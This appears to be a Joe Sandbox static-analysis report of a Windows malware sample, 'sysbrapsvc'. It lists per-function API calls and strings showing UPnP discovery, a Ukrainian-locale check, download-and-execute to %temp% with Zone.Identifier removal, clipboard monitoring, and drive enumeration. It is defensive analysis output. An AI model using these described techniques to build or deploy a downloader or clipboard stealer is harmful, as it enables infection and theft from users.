                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 0040DBDA
                                                                                • htons.WS2_32(0000076C), ref: 0040DC10
                                                                                • inet_addr.WS2_32(239.255.255.250), ref: 0040DC1F
                                                                                • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DC3D
                                                                                  • Part of subcall function 0040AF30: htons.WS2_32(00000050), ref: 0040AF5D
                                                                                  • Part of subcall function 0040AF30: socket.WS2_32(00000002,00000001,00000000), ref: 0040AF7D
                                                                                  • Part of subcall function 0040AF30: connect.WS2_32(000000FF,?,00000010), ref: 0040AF96
                                                                                  • Part of subcall function 0040AF30: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AFC8
                                                                                • bind.WS2_32(000000FF,?,00000010), ref: 0040DC73
                                                                                • lstrlenA.KERNEL32(00411C48,00000000,?,00000010), ref: 0040DC8C
                                                                                • sendto.WS2_32(000000FF,00411C48,00000000), ref: 0040DC9B
                                                                                • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DCB5
                                                                                  • Part of subcall function 0040DD40: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DD8E
                                                                                  • Part of subcall function 0040DD40: Sleep.KERNEL32(000003E8), ref: 0040DD9E
                                                                                  • Part of subcall function 0040DD40: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DDBB
                                                                                  • Part of subcall function 0040DD40: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DDD1
                                                                                  • Part of subcall function 0040DD40: StrChrA.SHLWAPI(?,0000000D), ref: 0040DDFE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                • String ID: 239.255.255.250
                                                                                • API String ID: 726339449-2186272203
                                                                                • Opcode ID: e3877ef1b52134d83e5684ab209baab9a63aea7bea6a3d9c299911e37c6d3f39
                                                                                • Instruction ID: ef7ed27ddc10e69a95ecf683d08ad8987f4418d9446925fcf09c3d01f5f265dc
                                                                                • Opcode Fuzzy Hash: e3877ef1b52134d83e5684ab209baab9a63aea7bea6a3d9c299911e37c6d3f39
                                                                                • Instruction Fuzzy Hash: 7141F8B4E10208ABDB14DFE4E889BEEBBB5EF48304F108169F505B7390E7B55A44CB59
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                                • htons.WS2_32(?), ref: 00401508
                                                                                • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                  • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
                                                                                  • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
                                                                                  • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
                                                                                • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                • String ID:
                                                                                • API String ID: 4174406920-0
                                                                                • Opcode ID: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
                                                                                • Instruction ID: ddf1df2f5e3c49f21769c3cd8a86baa6c810c68bf5de7ecead628d1f617bc177
                                                                                • Opcode Fuzzy Hash: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
                                                                                • Instruction Fuzzy Hash: 72319571A44301AFE320DF649C4AF9BB6E0AF48B14F40493DF695EB2E0D3B5D544879A
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040D1B2
                                                                                • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D1D8
                                                                                • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D20F
                                                                                • GetTickCount.KERNEL32 ref: 0040D224
                                                                                • Sleep.KERNEL32(00000001), ref: 0040D244
                                                                                • GetTickCount.KERNEL32 ref: 0040D24A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$Sleepioctlsocketrecv
                                                                                • String ID:
                                                                                • API String ID: 107502007-0
                                                                                • Opcode ID: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                                                                • Instruction ID: d1d91ce4da814b9a63f0d024f91aac80a52589da6ae3f0e8ee31fa34877a49b5
                                                                                • Opcode Fuzzy Hash: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                                                                • Instruction Fuzzy Hash: 5A31CA74D00209EFCF04DFA4DA48AEE77B1FF44315F1086A9E825A7290D7749A94CB59
                                                                                APIs
                                                                                • htons.WS2_32(00000050), ref: 0040AF5D
                                                                                  • Part of subcall function 0040AEF0: inet_addr.WS2_32(0040AF71), ref: 0040AEFA
                                                                                  • Part of subcall function 0040AEF0: gethostbyname.WS2_32(?), ref: 0040AF0D
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 0040AF7D
                                                                                • connect.WS2_32(000000FF,?,00000010), ref: 0040AF96
                                                                                • getsockname.WS2_32(000000FF,?,00000010), ref: 0040AFC8
                                                                                Strings
                                                                                • www.update.microsoft.com, xrefs: 0040AF67
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                • String ID: www.update.microsoft.com
                                                                                • API String ID: 4063137541-1705189816
APIs
• CryptAcquireContextW.ADVAPI32(~@,00000000,00000000,00000001,F0000040,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C343
• CryptGenRandom.ADVAPI32(~@,?,00000000,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C359
• CryptReleaseContext.ADVAPI32(~@,00000000,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C365
Strings
Yara matches
Similarity
• API ID: Crypt$Context$AcquireRandomRelease
• String ID: ~@
• API String ID: 1815803762-592544116
APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DA0D,00000000), ref: 004013D5
• socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
• bind.WS2_32(?,?,00000010), ref: 00401429
  • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
  • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
  • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
• CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
Yara matches
Similarity
• API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
• String ID:
• API String ID: 3943618503-0
APIs
• GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,004075E8), ref: 0040EBF3
• strcmp.NTDLL ref: 0040EC02
Strings
Yara matches
Similarity
• API ID: InfoLocalestrcmp
• String ID: UKR
• API String ID: 3191669094-64918367

Control-flow Graph

APIs
• GetTickCount.KERNEL32 ref: 0040EF99
• srand.MSVCRT ref: 0040EFA0
• ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040EFC0
• strlen.NTDLL ref: 0040EFCA
• mbstowcs.NTDLL ref: 0040EFE1
• rand.MSVCRT ref: 0040EFE9
• rand.MSVCRT ref: 0040EFFD
• wsprintfW.USER32 ref: 0040F024
• InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F03A
• InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F069
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F098
• InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F0CB
• WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F0FC
• CloseHandle.KERNEL32(000000FF), ref: 0040F10B
• wsprintfW.USER32 ref: 0040F124
• DeleteFileW.KERNEL32(?), ref: 0040F134
• Sleep.KERNEL32(000003E8), ref: 0040F13F
• Sleep.KERNEL32(000007D0), ref: 0040F160
• ExitProcess.KERNEL32 ref: 0040F188
• DeleteFileW.KERNEL32(?), ref: 0040F19E
• CloseHandle.KERNEL32(000000FF), ref: 0040F1AB
• InternetCloseHandle.WININET(00000000), ref: 0040F1B8
• InternetCloseHandle.WININET(00000000), ref: 0040F1C5
• Sleep.KERNEL32(000003E8), ref: 0040F1D0
• rand.MSVCRT ref: 0040F1E5
• Sleep.KERNEL32 ref: 0040F1FC
• rand.MSVCRT ref: 0040F202
• rand.MSVCRT ref: 0040F216
• wsprintfW.USER32 ref: 0040F23D
• DeleteUrlCacheEntryW.WININET(?), ref: 0040F24D
• URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F267
• wsprintfW.USER32 ref: 0040F287
• DeleteFileW.KERNEL32(?), ref: 0040F297
• Sleep.KERNEL32(000003E8), ref: 0040F2A2
• Sleep.KERNEL32(000007D0), ref: 0040F2C3
• ExitProcess.KERNEL32 ref: 0040F2EA
• DeleteFileW.KERNEL32(?), ref: 0040F2F9
Strings
• Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040F035
• %s\%d%d.exe, xrefs: 0040F018
• %s\%d%d.exe, xrefs: 0040F231
• %temp%, xrefs: 0040EFBB
• %s:Zone.Identifier, xrefs: 0040F118
• %s:Zone.Identifier, xrefs: 0040F27B
Yara matches
Similarity
• API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$ExitOpenProcess$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
• String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
• API String ID: 3526668077-2417596247

Control-flow Graph

APIs
  • Part of subcall function 0040B280: gethostname.WS2_32(?,00000100), ref: 0040B29C
  • Part of subcall function 0040B280: gethostbyname.WS2_32(?), ref: 0040B2AE
• strcmp.NTDLL ref: 0040B380
Strings
Yara matches
Similarity
• API ID: gethostbynamegethostnamestrcmp
• String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
• API String ID: 2906596889-2213908610

Control-flow Graph

APIs
• GetTickCount.KERNEL32 ref: 0040192C
• WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
• WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
• WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
• accept.WS2_32(?,?,?), ref: 004019A8
• GetTickCount.KERNEL32 ref: 004019F6
• EnterCriticalSection.KERNEL32(?), ref: 00401A09
• LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
• LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
• GetTickCount.KERNEL32 ref: 00401A43
• EnterCriticalSection.KERNEL32(?), ref: 00401A52
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
• LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
• GetTickCount.KERNEL32 ref: 00401AAB
• WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
Strings
Yara matches
Similarity
• API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
• String ID: PCOI$ilci
• API String ID: 3345448188-3762367603

Control-flow Graph

APIs
• memset.NTDLL ref: 0040E9C8
• InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EA18
• InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EA2B
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040EA64
• HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040EA9A
• HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040EAC5
• HttpSendRequestA.WININET(00000000,00411FA0,000000FF,00009E34), ref: 0040EAEF
• InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040EB2E
• memcpy.NTDLL(00000000,?,00000000), ref: 0040EB80
• InternetCloseHandle.WININET(00000000), ref: 0040EBB1
• InternetCloseHandle.WININET(00000000), ref: 0040EBBE
• InternetCloseHandle.WININET(00000000), ref: 0040EBCB
Strings
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                • API String ID: 2761394606-2217117414
                                                                                • Opcode ID: 9c5f2d3cdb4df672490472a7b015f26657257ad2340108b2c41028c19e4f182d
                                                                                • Instruction ID: 65d8e98dfcdbd5221f12c344ddab433f9c0af5994e8cd23f0dde2b718a24ef5d
                                                                                • Opcode Fuzzy Hash: 9c5f2d3cdb4df672490472a7b015f26657257ad2340108b2c41028c19e4f182d
                                                                                • Instruction Fuzzy Hash: 91512EB5901228ABDB26CF54CC54FE9B3BCAB48705F1485E9B60DA6280D7B86FC4CF54

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040591C
                                                                                • SetClipboardViewer.USER32(?), ref: 00405968
                                                                                • SetWindowLongW.USER32(?,000000EB,?), ref: 0040597B
                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 004059D0
                                                                                • OpenClipboard.USER32(00000000), ref: 00405A17
                                                                                • GetClipboardData.USER32(00000000), ref: 00405A29
                                                                                • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B30
                                                                                • ChangeClipboardChain.USER32(?,?), ref: 00405B3E
                                                                                • DefWindowProcA.USER32(?,?,?,?), ref: 00405B54
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                • String ID:
                                                                                • API String ID: 3549449529-0
                                                                                • Opcode ID: cb19e17cacb7ad962392a7750cfffe1c2c8f8667cd08c9b5de7b834d1fa684ec
                                                                                • Instruction ID: ab6473899f09a2e4ce72b89913391a8d882f42dafbfb3729ae4d66df8233a766
                                                                                • Opcode Fuzzy Hash: cb19e17cacb7ad962392a7750cfffe1c2c8f8667cd08c9b5de7b834d1fa684ec
                                                                                • Instruction Fuzzy Hash: 6671FC75A00608EFDF14DFA4D988BAFB7B4EB48300F14856AE506B6290D7799A40CF69

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Similarity
                                                                                • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                • String ID: PCOI$ilci
                                                                                • API String ID: 2403999931-3762367603
                                                                                • Opcode ID: fdb9d9f1c1081d3bac4efd2c1ea591fdf2f72c624c4a3d2a847f061e6529de26
                                                                                • Instruction ID: 4aeae16d9e67a94d8ff1aa5cc2109be900ec35187bf01e7539301e61904878f7
                                                                                • Opcode Fuzzy Hash: fdb9d9f1c1081d3bac4efd2c1ea591fdf2f72c624c4a3d2a847f061e6529de26
                                                                                • Instruction Fuzzy Hash: FA319475900705ABC7209F70EC48B97B7A8BF08300F048A3AF559A3691C77AF894CB98

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.NTDLL ref: 00405838
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00405850
                                                                                • Sleep.KERNEL32(00000001), ref: 00405864
                                                                                • GetTickCount.KERNEL32 ref: 0040586A
                                                                                • GetTickCount.KERNEL32 ref: 00405873
                                                                                • wsprintfW.USER32 ref: 00405886
                                                                                • RegisterClassExW.USER32(00000030), ref: 00405893
                                                                                • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 004058BC
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004058D7
                                                                                • TranslateMessage.USER32(?), ref: 004058E5
                                                                                • DispatchMessageA.USER32(?), ref: 004058EF
                                                                                • ExitThread.KERNEL32 ref: 00405901
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Similarity
                                                                                • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                • String ID: %x%X$0
                                                                                • API String ID: 716646876-225668902
                                                                                • Opcode ID: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                                                                • Instruction ID: f3e1014eb48ffaf448ebc99f6ba60d6258e7c56012e586919e9efecad1237f6d
                                                                                • Opcode Fuzzy Hash: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                                                                • Instruction Fuzzy Hash: BB211A71940308BBEB10ABA0DC49FEE7B78EB04711F108439F606BA1D0DBB995948F69

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.NTDLL ref: 0040E098
                                                                                • InternetCrackUrlA.WININET(0040DB49,00000000,10000000,0000003C), ref: 0040E0E8
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E0F8
                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E131
                                                                                • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E167
                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E18F
                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E1D8
                                                                                • memcpy.NTDLL(00000000,?,00000000), ref: 0040E22A
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E267
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E274
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E281
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                • String ID: <$GET
                                                                                • API String ID: 1205665004-427699995
                                                                                • Opcode ID: b5606582fcf9fad391a6fa346b47e70fe2b71523f8a0056a0553dfb9fae7cb88
                                                                                • Instruction ID: 8a187a806069c9ef74607f7bf39df95f2c1829c28a5b92bcc4b0b83bf30a7a56
                                                                                • Opcode Fuzzy Hash: b5606582fcf9fad391a6fa346b47e70fe2b71523f8a0056a0553dfb9fae7cb88
                                                                                • Instruction Fuzzy Hash: 16512DB1941228ABDB36CB50CC55BE9B3BCAB48705F1444E9F60DAA2C0D7B96BC4CF54

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Sleep.KERNEL32(000003E8), ref: 00406B5E
                                                                                • GetModuleFileNameW.KERNEL32(00000000,0041A428,00000104), ref: 00406B70
                                                                                  • Part of subcall function 0040EC20: CreateFileW.KERNEL32(00406B80,80000000,00000001,00000000,00000003,00000000,00000000,00406B80), ref: 0040EC40
                                                                                  • Part of subcall function 0040EC20: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040EC55
                                                                                  • Part of subcall function 0040EC20: CloseHandle.KERNEL32(000000FF), ref: 0040EC62
                                                                                • ExitThread.KERNEL32 ref: 00406CDA
                                                                                  • Part of subcall function 00406340: GetLogicalDrives.KERNEL32 ref: 00406346
                                                                                  • Part of subcall function 00406340: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                                                  • Part of subcall function 00406340: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                                                  • Part of subcall function 00406340: RegCloseKey.ADVAPI32(?), ref: 004063DE
                                                                                • Sleep.KERNEL32(000007D0), ref: 00406CCD
                                                                                  • Part of subcall function 00406260: lstrcpyW.KERNEL32(?,?), ref: 004062B3
                                                                                • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C0F
                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C24
                                                                                • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406C3F
                                                                                • wsprintfW.USER32 ref: 00406C52
                                                                                • wsprintfW.USER32 ref: 00406C72
                                                                                • wsprintfW.USER32 ref: 00406C95
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Similarity
                                                                                • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                • API String ID: 1650488544-2117135753
                                                                                • Opcode ID: 6d9c390415530bf0d7068dac02101ca91c021f24dc2fb290cfd9444ed22e654c
                                                                                • Instruction ID: 453264953970db4b87c24ab6cdbfc4a104d47f91dccd03b52bb95ce70ceb3e7a
                                                                                • Opcode Fuzzy Hash: 6d9c390415530bf0d7068dac02101ca91c021f24dc2fb290cfd9444ed22e654c
                                                                                • Instruction Fuzzy Hash: E041A9B1940218BBE714DB94DD55FEE7378BB48700F0081BAF20AB61D0DA785B94CF6A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040ECA2
                                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040ECC3
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040ECE2
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040ECFB
                                                                                • memcmp.NTDLL ref: 0040ED8D
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040EDB0
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040EDBA
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040EDC4
                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EDE3
                                                                                • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040EE08
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040EE12
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
